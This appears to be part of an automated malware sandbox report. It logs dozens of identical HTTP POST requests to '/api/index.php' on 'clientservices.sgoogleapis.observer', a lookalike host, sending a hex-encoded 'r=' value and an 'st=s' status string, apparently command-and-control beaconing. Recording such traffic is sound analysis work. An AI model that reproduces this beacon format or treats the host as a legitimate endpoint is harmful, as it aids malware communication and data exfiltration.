          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
